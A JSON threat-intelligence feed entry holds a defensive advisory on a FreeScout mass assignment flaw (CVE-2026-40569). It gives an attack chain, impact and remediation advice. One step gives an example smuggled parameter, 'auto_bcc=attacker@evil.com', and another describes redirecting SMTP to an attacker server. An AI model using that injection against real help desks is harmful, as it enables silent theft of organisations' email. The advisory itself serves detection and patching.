{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/email-exfiltration/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":9,"id":"CVE-2026-40569"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["freescout","mass-assignment","vulnerability","email-exfiltration"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFreeScout, a self-hosted help desk and shared mailbox platform, is vulnerable to a mass assignment flaw (CVE-2026-40569) in versions prior to 1.8.213. The vulnerability resides in the \u003ccode\u003econnectionIncomingSave()\u003c/code\u003e and \u003ccode\u003econnectionOutgoingSave()\u003c/code\u003e methods within \u003ccode\u003eapp/Http/Controllers/MailboxesController.php\u003c/code\u003e. These methods lack proper input validation, allowing an authenticated administrator to overwrite critical mailbox settings by injecting arbitrary parameters into legitimate connection setting update requests. Attackers can modify fields like \u003ccode\u003eauto_bcc\u003c/code\u003e, \u003ccode\u003eout_server\u003c/code\u003e, \u003ccode\u003eout_password\u003c/code\u003e, \u003ccode\u003esignature\u003c/code\u003e, \u003ccode\u003eauto_reply_enabled\u003c/code\u003e, and \u003ccode\u003eauto_reply_message\u003c/code\u003e. This issue allows malicious actors to silently surveil communications, redirect SMTP traffic, inject malicious content, and persistently compromise email accounts. The impact is particularly severe in multi-admin environments or when an admin session is compromised through other means (e.g., XSS). 
FreeScout version 1.8.213 addresses this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains authenticated access to the FreeScout admin panel, either through legitimate credentials or by exploiting another vulnerability (e.g., XSS).\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to the mailbox connection settings page.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a legitimate request to update connection settings, such as IMAP or SMTP server details.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious parameters into the request, such as \u003ccode\u003eauto_bcc=attacker@evil.com\u003c/code\u003e, which are not directly exposed in the connection settings form.\u003c/li\u003e\n\u003cli\u003eThe FreeScout application, due to the mass assignment vulnerability in \u003ccode\u003econnectionIncomingSave()\u003c/code\u003e or \u003ccode\u003econnectionOutgoingSave()\u003c/code\u003e, processes the injected parameters and updates the corresponding mailbox settings in the database.\u003c/li\u003e\n\u003cli\u003eWhen \u003ccode\u003eauto_bcc\u003c/code\u003e is set, every outgoing email from the compromised mailbox is silently BCC\u0026rsquo;d to the attacker-controlled email address via the \u003ccode\u003eSendReplyToCustomer\u003c/code\u003e job.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker could modify the \u003ccode\u003eout_server\u003c/code\u003e and \u003ccode\u003eout_password\u003c/code\u003e fields to redirect outgoing SMTP traffic through an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to all outgoing email from the affected mailbox, enabling data exfiltration or further malicious activities like phishing.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to complete compromise of FreeScout 
mailboxes. An attacker could silently exfiltrate sensitive email communications, potentially impacting hundreds or thousands of users depending on the size of the organization. The injected parameters persist even after the initial attack, providing long-term access. This is especially dangerous in organizations that handle sensitive customer data or financial information. The ability to redirect SMTP traffic and inject malicious content further amplifies the risk, potentially leading to widespread phishing campaigns and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade FreeScout to version 1.8.213 or later to patch CVE-2026-40569 immediately.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization for all user-supplied data, particularly in the \u003ccode\u003econnectionIncomingSave()\u003c/code\u003e and \u003ccode\u003econnectionOutgoingSave()\u003c/code\u003e methods, to prevent mass assignment vulnerabilities.\u003c/li\u003e\n\u003cli\u003eReview existing FreeScout installations for any unauthorized modifications to mailbox settings, specifically focusing on \u003ccode\u003eauto_bcc\u003c/code\u003e, \u003ccode\u003eout_server\u003c/code\u003e, \u003ccode\u003eout_password\u003c/code\u003e, \u003ccode\u003esignature\u003c/code\u003e, \u003ccode\u003eauto_reply_enabled\u003c/code\u003e, and \u003ccode\u003eauto_reply_message\u003c/code\u003e fields (requires direct database inspection).\u003c/li\u003e\n\u003cli\u003eMonitor FreeScout webserver logs for POST requests to \u003ccode\u003e/mailboxes/*/connection/incoming-save\u003c/code\u003e and \u003ccode\u003e/mailboxes/*/connection/outgoing-save\u003c/code\u003e endpoints containing unexpected parameters to detect potential exploitation attempts (see example Sigma rule below).\u003c/li\u003e\n\u003cli\u003eEnable webserver logging and ensure that POST request bodies are captured to facilitate 
investigation and detection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-22T12:00:00Z","date_published":"2026-04-22T12:00:00Z","id":"/briefs/2026-04-freescout-mass-assignment/","summary":"FreeScout versions prior to 1.8.213 contain a mass assignment vulnerability allowing authenticated admins to modify sensitive mailbox settings by injecting parameters into connection settings requests, leading to email exfiltration and account compromise.","title":"FreeScout Mass Assignment Vulnerability (CVE-2026-40569)","url":"https://feed.craftedsignal.io/briefs/2026-04-freescout-mass-assignment/"}],"language":"en","title":"CraftedSignal Threat Feed — Email-Exfiltration","version":"https://jsonfeed.org/version/1.1"}